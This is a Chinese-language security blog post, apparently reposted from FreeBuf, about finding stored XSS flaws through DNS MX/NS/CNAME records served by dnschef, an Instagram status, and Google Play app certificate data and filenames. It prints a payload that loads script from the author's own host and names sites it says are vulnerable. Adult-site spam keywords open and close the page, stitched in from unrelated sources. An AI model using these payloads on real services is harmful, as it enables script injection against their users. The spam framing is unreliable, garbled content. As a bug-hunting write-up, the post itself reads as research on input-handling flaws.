成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

我們要在任何可能的地方測試XSS漏洞

安全 應用安全 漏洞
在這篇文章中,我準備跟大家討論幾種不同的場景,在這些場景中,不同的服務都會收集各種各樣的數據,但它們又無法正確地去處理這些數據。

在這篇文章中,我準備跟大家討論幾種不同的場景,在這些場景中,不同的服務都會收集各種各樣的數據,但它們又無法正確地去處理這些數據。在某些情況下,數據采用的是安全格式存儲和傳輸的,但是由于數據的解析操作以及進一步處理的過程中存在安全問題,將導致無害的字符串變成攻擊向量。

XSS和DNS

如果你在搜索引擎中搜索“通過DNS實現XSS”(XSS via DNS)的相關話題,你將會看到類似【參考資料一】和【參考資料二】這種介紹如何在TXT記錄中傳遞XSS攻擊向量的文章。但是為什么沒有人考慮過其他類型的記錄呢?比如說CNAME或NS之類的。因為如果你想把域名作為一個攻擊向量的話,你還需要創(chuàng)建自己的NS服務器。

也許使用DNSCHEF會是一個好主意。

 

我使用的子域名是hack.bo0om.ru(任何子域名都可以),并且將我的IP設置成了該域名的NS服務器。接下來修改dnschef.ini并完成dnschef的配置,添加下列記錄:

  1. [MX]  
  2.  
  3. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 
  4.  
  5. [NS]  
  6.  
  7. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 
  8.  
  9. [CNAME] 
  10.  
  11. *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js> 

如果某個在線服務得到了DNS數據之后還將它們打印在了屏幕上,只能說明該服務忘記過濾掉這些數據了。

 

下面是一些存在XSS漏洞的例子:

  1. ·        who.is 
  2.  
  3. ·        robtex.com 
  4.  
  5. ·        dnsqueries.com 
  6.  
  7. ·        etc 

XSS和Instagram

有一次我只是為了好玩,然后將一段XSS Payload添加到了我Instagram的個人狀態(tài)中。一開始沒發(fā)生什么有趣的事,而且這個XSS Payload也是沒有攻擊性的。

 

但是之后我發(fā)現,這個XSS Payload竟然在另外的域名和在線服務中起作用了,從我的Web服務器日志記錄來看,這些域名貌似指向的是社交網絡解析器和一些分析服務。下面給出的是其中部分示例:

  1. ·        findgram.me 
  2.  
  3. ·        imgrab.com 
  4.  
  5. ·        instagy.com 
  6.  
  7. ·        iconosquare.com 
  8.  
  9. ·        tofo.me 
  10.  
  11. ·        photo.sh 
  12.  
  13. ·        gramosphere.com 

不過其中有一部分已經修復了這個漏洞。

XSS和Google Play

最近,@Black2Fan給我發(fā)了一條信息,并問我能不能夠在Google Play應用商店上傳存在XSS漏洞的Android App。我當時都不知道竟然還有這種操作!但我感覺可行。于是我自己弄了一個App,然后為這個App生成了一個證書,并將其中的開發(fā)者名稱和其他數據用XSS向量進行了替換。

XSS和Google Play

我用一些包含惡意代碼的文件以及文件路徑組成了一個有效的頁面標簽,并從我自己的域名加載相應的腳本文件。

注:Linux系統(tǒng)支持在文件名中使用特殊字符。

雖然我們可以在文件名中注入自己的腳本代碼,但壞消息是這里有30個字符的限制。不幸的是,我手上可以使用的域名都有點長,而且那些只有一個或兩個字符的域名估計都已經被注冊掉了。但是在現代Web中,你可以使用punycode編碼來注冊域名,而且現在還有很多免費的punycode域名沒有被注冊。比如說xn--g3h。所以我注冊了一個.ws域名(請參考下圖,有個符號這里打不出來,包括點號在內一共四個字符)。

XSS和Google Play

這個App目前仍然可以在Google Play應用商店中找到,但是它隨時可能被刪掉。

而且更加有趣的是,當我將這個App上傳到VirusTotal之后,其中的XSS向量竟然觸發(fā)了反病毒產品Web端面板中的漏洞。哈哈哈…而且除了VirusTotla之外,還有兩家天朝的安全廠商也存在這種問題,但這里我就不直接提他們的名字了。

總結

 

作為一個Bug Hunter,雖然我這一次的發(fā)現沒能拿到漏洞獎金,但希望可以給大家提供一種新的挖洞思路,其實我也只是為了好玩而已:D不喜勿噴

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2018-05-14 15:10:10

Vim編輯器Linux

2020-06-05 10:20:50

Linux發(fā)行版內存

2020-06-05 08:12:45

Linux發(fā)行版操作系統(tǒng)

2017-02-16 15:47:12

2021-06-22 09:22:05

Hyper-V遠程管理虛擬化

2013-12-17 09:51:52

SVNgit

2021-07-16 08:00:00

開發(fā)VSCode編輯器

2020-01-21 21:35:30

代碼開發(fā)工具

2011-08-31 09:40:25

VMwareWindows

2017-09-19 15:45:39

2023-12-31 09:06:08

2010-04-30 15:45:09

2020-07-13 23:19:53

物聯(lián)網安全技術

2020-05-19 11:54:04

腳本語言Linux命令

2009-12-29 14:25:14

phpXSS漏洞

2013-11-27 17:12:27

2019-03-25 07:27:14

XSS漏洞Ecshop

2021-07-15 17:50:34

Windows 365云服務微軟

2024-04-24 13:59:02

云原生應用

2015-02-10 14:32:37

XSS漏洞XSS
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 在线观看亚洲专区 | 久久久久久久久久久久久91 | 国产成人在线视频免费观看 | 国产精品99久久久久久动医院 | 日韩高清一区 | 一区二区三区在线免费观看 | 精品在线视频播放 | 色www精品视频在线观看 | 久久草在线视频 | 激情欧美一区二区三区中文字幕 | 久在线| 网站黄色av | 国产欧美日韩在线 | 精品无码久久久久国产 | 国产高清精品一区二区三区 | 一区二区三区在线免费观看视频 | 亚洲黄色av网站 | 91麻豆精品国产91久久久更新资源速度超快 | 午夜天堂精品久久久久 | 韩日有码 | 国产精品久久久久久久久免费桃花 | 狠狠操狠狠操 | 秋霞精品 | 日韩在线一区二区 | www.中文字幕 | 精品久久久久一区二区国产 | 精品视频久久久久久 | 亚洲成人av | 久草免费在线视频 | 在线观看视频你懂得 | 国产精品久久久久久久久久久久久 | 91久久夜色 | 亚洲欧美精品在线 | 操操日 | a天堂在线| 国产一级在线观看 | 亚洲成人一区二区 | 久久久久久久久久久丰满 | 亚洲精品久久久一区二区三区 | 精品欧美一区二区精品久久久 | 亚洲色片网站 |